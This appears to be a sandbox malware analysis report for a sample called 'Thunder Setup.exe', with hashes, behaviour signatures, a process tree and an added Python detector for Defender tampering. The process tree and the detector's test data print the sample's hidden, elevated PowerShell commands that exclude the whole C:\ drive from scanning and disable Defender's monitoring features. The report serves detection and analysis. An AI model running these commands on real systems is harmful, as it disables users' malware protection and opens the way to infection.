Analysis
- max time kernel: 363s
- max time network: 342s
- platform: windows11-21h2_x64
- resource: win11-20240709-en
- resource tags: arch:x64, arch:x86, image:win11-20240709-en, locale:en-us, os:windows11-21h2-x64, system
- submitted: 14/07/2024, 22:14
Static task: static1
Behavioral task behavioral1: Sample Thunder Setup.exe, Resource win7-20240708-en
Behavioral task behavioral2: Sample Thunder Setup.exe, Resource win10-20240404-en
Behavioral task behavioral3: Sample Thunder Setup.exe, Resource win10v2004-20240709-en
Behavioral task behavioral4: Sample Thunder Setup.exe, Resource win11-20240709-en (this report)
General
- Target: Thunder Setup.exe
- Size: 78KB
- MD5: 1eb797341e423c83060a36b92c720cc9
- SHA1: 380828212f0bb9a82d568491247a590a316e4351
- SHA256: 0842a46a5113b1ff571e62101c556565c853a0c0c792f7fdde57eb40e0256177
- SHA512: 9115d3a22f0163747de035273cd44caa84c46e17cd3fee863172e35688455def25e07bdbf7bdcec940dfd8bd2da7eb10e360d7f5a9413efc8c4b61ad4605c19b
- SSDEEP: 1536:aZ2FWSNhd/4131izmvch6oKnLzx9QAkhHQ40Gp/VS6:A2ddQ131izLh6oqLzHHuHQ40Gp/VT
Malware Config
Signatures
- Command and Scripting Interpreter: PowerShell (1 TTPs, 9 IoCs)
  Run Powershell and hide display window.
  pid   Process
  3372  Powershell.exe
  2476  Powershell.exe
  4328  Powershell.exe
  3388  Powershell.exe
  3372  Powershell.exe
  228   powershell.exe
  4492  powershell.exe
  4468  powershell.exe
  2752  powershell.exe
- Suspicious behavior: EnumeratesProcesses (16 IoCs)
  pid   Process
  3372  Powershell.exe
  2476  Powershell.exe
  4328  Powershell.exe
  3388  Powershell.exe
  3372  Powershell.exe
  3388  Powershell.exe
  2476  Powershell.exe
  4328  Powershell.exe
  4468  powershell.exe
  2752  powershell.exe
  228   powershell.exe
  4468  powershell.exe
  228   powershell.exe
  4492  powershell.exe
  2752  powershell.exe
  4492  powershell.exe
- Suspicious use of AdjustPrivilegeToken (8 IoCs)
  description              pid   Process
  Token: SeDebugPrivilege  4328  Powershell.exe
  Token: SeDebugPrivilege  3388  Powershell.exe
  Token: SeDebugPrivilege  2476  Powershell.exe
  Token: SeDebugPrivilege  3372  Powershell.exe
  Token: SeDebugPrivilege  228   powershell.exe
  Token: SeDebugPrivilege  4468  powershell.exe
  Token: SeDebugPrivilege  2752  powershell.exe
  Token: SeDebugPrivilege  4492  powershell.exe
- Suspicious use of SetWindowsHookEx (1 IoCs)
  pid   Process
  1260  javaw.exe
- Suspicious use of WriteProcessMemory (27 IoCs)
  description                        pid   Process            procid_target
  PID 3412 wrote to memory of 1260   3412  Thunder Setup.exe  82
  PID 3412 wrote to memory of 1260   3412  Thunder Setup.exe  82
  PID 3412 wrote to memory of 1260   3412  Thunder Setup.exe  82
  PID 1260 wrote to memory of 3372   1260  javaw.exe          83
  PID 1260 wrote to memory of 3372   1260  javaw.exe          83
  PID 1260 wrote to memory of 3372   1260  javaw.exe          83
  PID 1260 wrote to memory of 3388   1260  javaw.exe          84
  PID 1260 wrote to memory of 3388   1260  javaw.exe          84
  PID 1260 wrote to memory of 3388   1260  javaw.exe          84
  PID 1260 wrote to memory of 4328   1260  javaw.exe          85
  PID 1260 wrote to memory of 4328   1260  javaw.exe          85
  PID 1260 wrote to memory of 4328   1260  javaw.exe          85
  PID 1260 wrote to memory of 2476   1260  javaw.exe          86
  PID 1260 wrote to memory of 2476   1260  javaw.exe          86
  PID 1260 wrote to memory of 2476   1260  javaw.exe          86
  PID 3372 wrote to memory of 228    3372  Powershell.exe     91
  PID 3372 wrote to memory of 228    3372  Powershell.exe     91
  PID 3372 wrote to memory of 228    3372  Powershell.exe     91
  PID 2476 wrote to memory of 4468   2476  Powershell.exe     92
  PID 2476 wrote to memory of 4468   2476  Powershell.exe     92
  PID 2476 wrote to memory of 4468   2476  Powershell.exe     92
  PID 3388 wrote to memory of 2752   3388  Powershell.exe     93
  PID 3388 wrote to memory of 2752   3388  Powershell.exe     93
  PID 3388 wrote to memory of 2752   3388  Powershell.exe     93
  PID 4328 wrote to memory of 4492   4328  Powershell.exe     97
  PID 4328 wrote to memory of 4492   4328  Powershell.exe     97
  PID 4328 wrote to memory of 4492   4328  Powershell.exe     97
Processes
- (depth 1) C:\Users\Admin\AppData\Local\Temp\Thunder Setup.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\Thunder Setup.exe"
  - Suspicious use of WriteProcessMemory
  PID: 3412
  - (depth 2) C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "lib\.;lib\..;lib\activation.jar;lib\antlr4-runtime.jar;lib\asm-all.jar;lib\commons-email.jar;lib\connector-api.jar;lib\dn-compiled-module.jar;lib\dn-php-sdk.jar;lib\dyn4j.jar;lib\gson.jar;lib\HikariCP-java6.jar;lib\javassist-GA.jar;lib\jaybird-jdk18.jar;lib\jfoenix.jar;lib\jkeymaster.jar;lib\jna.jar;lib\jphp-app-framework.jar;lib\jphp-core.jar;lib\jphp-desktop-ext.jar;lib\jphp-desktop-hotkey-ext.jar;lib\jphp-game-ext.jar;lib\jphp-gui-ext.jar;lib\jphp-gui-jfoenix-ext.jar;lib\jphp-json-ext.jar;lib\jphp-jsoup-ext.jar;lib\jphp-mail-ext.jar;lib\jphp-runtime.jar;lib\jphp-sql-ext.jar;lib\jphp-systemtray-ext.jar;lib\jphp-xml-ext.jar;lib\jphp-zend-ext.jar;lib\jphp-zip-ext.jar;lib\jsoup.jar;lib\mail.jar;lib\mysql-connector-java.jar;lib\postgresql.jre7.jar;lib\slf4j-api.jar;lib\slf4j-simple.jar;lib\sqlite-jdbc.jar;lib\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID: 1260
    - (depth 3) C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
      Command line: Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Add-MpPreference -Force -ExclusionPath C:\' -Verb RunAs}"
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 3372
      - (depth 4) C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -Force -ExclusionPath C:\
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 228
    - (depth 3) C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
      Command line: Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Set-MpPreference -Force -DisableBehaviorMonitoring ' -Verb RunAs}"
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 3388
      - (depth 4) C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableBehaviorMonitoring
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 2752
    - (depth 3) C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
      Command line: Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Set-MpPreference -Force -DisableIOAVProtection ' -Verb RunAs}"
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 4328
      - (depth 4) C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableIOAVProtection
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 4492
    - (depth 3) C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
      Command line: Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Set-MpPreference -Force -DisableRealtimeMonitoring ' -Verb RunAs}"
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 2476
      - (depth 4) C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableRealtimeMonitoring
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 4468
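The process tree above is the whole story of this sample's behaviour in the sandbox: the dropped JRE runs a jphp/DevelNext application (org.develnext.jphp.ext.javafx.FXLauncher), which spawns four 32-bit PowerShell processes. Each one relaunches PowerShell hidden and elevated through Start-Process -Verb RunAs, and the elevated child then adds a Defender exclusion for the entire C:\ drive and switches off behavior monitoring, IOAV (download and attachment) scanning and real-time monitoring (ATT&CK T1562.001, Impair Defenses: Disable or Modify Tools). Two details worth a detection engineer's attention: excluding a drive root is equivalent to disabling scanning, and the elevated children's command lines name System32\WindowsPowerShell\v1.0\powershell.exe while the recorded image is under SysWOW64, because the 32-bit parent is subject to WOW64 file-system redirection. The block below is an added example, not code from the sandbox or from the sample: a small detector over process-creation records modelled on this tree. The ProcEvent schema, the constructed event list (javaw classpath trimmed), the two benign control events and the severity rules are assumptions of the example.

```python
"""Flag Microsoft Defender tampering in process-creation telemetry.
Added example for this report, not sandbox or sample code. The records are
constructed from the process tree above; the ProcEvent schema is assumed."""
import re
from dataclasses import dataclass

@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str    # image actually loaded, as a sensor records it
    cmdline: str  # command line as supplied by the parent

PS_WOW = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
PS_WOW_OUTER = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe"
PS_SYS32 = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

def outer(pid, inner):  # outer PowerShell relaunching itself elevated and hidden
    return ProcEvent(pid, 1260, PS_WOW_OUTER,
                     f"Powershell.exe -Command \"& {{Start-Process Powershell.exe "
                     f"-WindowStyle hidden -ArgumentList '-Command {inner}' -Verb RunAs}}\"")

def elevated(pid, ppid, inner):  # inner, elevated PowerShell running the cmdlet
    return ProcEvent(pid, ppid, PS_WOW, f'"{PS_SYS32}" -Command {inner}')

# Constructed events modelled on the report (javaw classpath trimmed) plus two
# benign controls: a read-only query and a narrow build-directory exclusion.
EVENTS = [
    ProcEvent(3412, 1000, r"C:\Users\Admin\AppData\Local\Temp\Thunder Setup.exe",
              r'"C:\Users\Admin\AppData\Local\Temp\Thunder Setup.exe"'),
    ProcEvent(1260, 3412, r"C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe",
              r'"C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe" -classpath '
              r'"lib\jphp-core.jar" org.develnext.jphp.ext.javafx.FXLauncher'),
    outer(3372, "Add-MpPreference -Force -ExclusionPath C:\\"),
    elevated(228, 3372, "Add-MpPreference -Force -ExclusionPath C:\\"),
    outer(3388, "Set-MpPreference -Force -DisableBehaviorMonitoring"),
    elevated(2752, 3388, "Set-MpPreference -Force -DisableBehaviorMonitoring"),
    outer(4328, "Set-MpPreference -Force -DisableIOAVProtection"),
    elevated(4492, 4328, "Set-MpPreference -Force -DisableIOAVProtection"),
    outer(2476, "Set-MpPreference -Force -DisableRealtimeMonitoring"),
    elevated(4468, 2476, "Set-MpPreference -Force -DisableRealtimeMonitoring"),
    ProcEvent(5000, 4000, PS_SYS32, "powershell.exe -Command Get-MpPreference"),
    ProcEvent(6000, 4000, PS_SYS32,
              r"powershell.exe -Command Add-MpPreference -ExclusionPath C:\Build\cache"),
]

# PowerShell parameter names are case-insensitive; these patterns cover the full
# names used in the report (abbreviated parameters would need more patterns).
_DISABLE = re.compile(r"Set-MpPreference\b.*?-(Disable\w+)", re.IGNORECASE)
_EXCLUSION = re.compile(
    r"Add-MpPreference\b.*?-Exclusion(Path|Process|Extension)\s+'?([^\s'\"]+)", re.IGNORECASE)
_ELEVATE = re.compile(r"Start-Process\b.*?-Verb\s+RunAs", re.IGNORECASE)
_HIDDEN = re.compile(r"-WindowStyle\s+hidden", re.IGNORECASE)

def is_broad_path(path):
    """A drive root, or all of Users or Windows, takes nearly everything out of scanning."""
    p = path.rstrip("\\").lower()
    return re.fullmatch(r"[a-z]:", p) is not None or p in {r"c:\users", r"c:\windows"}

def classify(cmdline):
    """Tags for Defender tampering and evasion traits found in one command line."""
    tags = [f"defender_disable:{m.group(1)}" for m in _DISABLE.finditer(cmdline)]
    for kind, value in _EXCLUSION.findall(cmdline):
        tag = f"defender_exclusion_{kind.lower()}:{value}"
        if kind.lower() == "path" and is_broad_path(value):
            tag += " (broad)"
        tags.append(tag)
    if _ELEVATE.search(cmdline):
        tags.append("elevation:Start-Process -Verb RunAs")
    if _HIDDEN.search(cmdline):
        tags.append("hidden_window")
    return tags

def wow64_redirected(ev):
    # A 32-bit parent asking for the System32 binary gets the SysWOW64 copy through
    # WOW64 file-system redirection, so the recorded image and the command line disagree.
    return "\\syswow64\\" in ev.image.lower() and "\\system32\\" in ev.cmdline.lower()

def ancestry(events, pid):
    """Image names from the process up to the root of the recorded tree."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid].image.rsplit("\\", 1)[-1])
        pid = by_pid[pid].ppid
    return chain

def find_defender_tampering(events):
    """One alert per event whose command line changes Defender preferences."""
    alerts = []
    for ev in events:
        tags = classify(ev.cmdline)
        if not any(t.startswith("defender_") for t in tags):
            continue
        if wow64_redirected(ev):
            tags.append("wow64_redirected_image")
        high = any(t.startswith("defender_disable") or t.endswith("(broad)") for t in tags)
        alerts.append({"pid": ev.pid, "severity": "high" if high else "medium",
                       "findings": tags, "chain": ancestry(events, ev.pid)})
    return alerts

ALERTS = find_defender_tampering(EVENTS)  # 9 alerts: 8 high from the tree, 1 medium control
```

On real telemetry the same three fields come from Sysmon Event ID 1 (Image, CommandLine, ParentProcessId) or an EDR's process-creation stream; the ancestry walk is what turns "PowerShell changed a Defender setting" into "a PowerShell spawned by a javaw.exe under a user's Temp directory changed a Defender setting", which is the part worth paging on. Corroborate from the host side with the Microsoft-Windows-Windows Defender/Operational log, where a configuration change is Event ID 5007 and real-time protection being disabled is Event ID 5001.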
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 1KB
  MD5: e080d58e6387c9fd87434a502e1a902e
  SHA1: ae76ce6a2a39d79226c343cfe4745d48c7c1a91a
  SHA256: 6fc482e46f6843f31d770708aa936de4cc32fec8141154f325438994380ff425
  SHA512: 6c112200ef09e724f2b8ab7689a629a09d74db2dcb4dd83157dd048cbe74a7ce5d139188257efc79a137ffebde0e3b61e0e147df789508675fedfd11fcad9ede
- Filesize: 15KB
  MD5: 16314c04a37cc6d058ee56b5d84d4314
  SHA1: 84755304afdefc5f46eabd968118e0e3d58ca445
  SHA256: 2a9d5b2794ed96fd5d64251caa59246639e3e7396962799d301064f8bb6f2842
  SHA512: f6a49d5cb852bf646d229634bba46c635a3a3447c881995f1001e4412b0c488da8627c7671b6ce7395266a99ecfdebb23c214ddc9629e4870c84fc2b3ec46204
- Filesize: 15KB
  MD5: 52c9680010aca432dc3356400aa57c5d
  SHA1: 07bd979b1253bd8297c439f32fff951c9dbe843e
  SHA256: 0035e88cf9be129b61bd5317e12d7bbcccbb3a4a4153a2f84929ccec1dd7ba89
  SHA512: a22e29fb4f8675761e3ffb711f636d3264baf6ef31c2bfa5fd3904d3839f5fefbe21650e3b14ce098b9cc4e158ec9146f177a3cdfebbc1d1c9d7401595290259
- Filesize: 18KB
  MD5: e6b946e8259524ea78190238b9b8d836
  SHA1: 8f7767914c5290c31017f267be36661481b4d67d
  SHA256: 1567aff186a93c9bd2baf1e5c8b96f3df14dac44289533a0754110d569019e24
  SHA512: 88b3ccd4b010a8823e77763c6724dab9ea3c453a6b3f0249842d08e4b342f7353a61384fd9ec6dd50c78d9161500d99685985031f2a16519ac3ea8f04ce14b4f
- Filesize: 18KB
  MD5: b934a085c6e1f7b4c8cd1a67bd393152
  SHA1: e06404354bb05aaac04137a8412b158ef0da4192
  SHA256: f42c303b5ffb4da3fadecae6fb4c7bdb2f31b6adeb9552a1bb63cd15ce74c14a
  SHA512: a513203f187b43236278c5ecbbf809e6c56e97ff1e9f541775aef5f597aca133586a5ff93776e9b19b0d02d47cf9df3706e3c1e5a650003915a32074324cd596
- Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82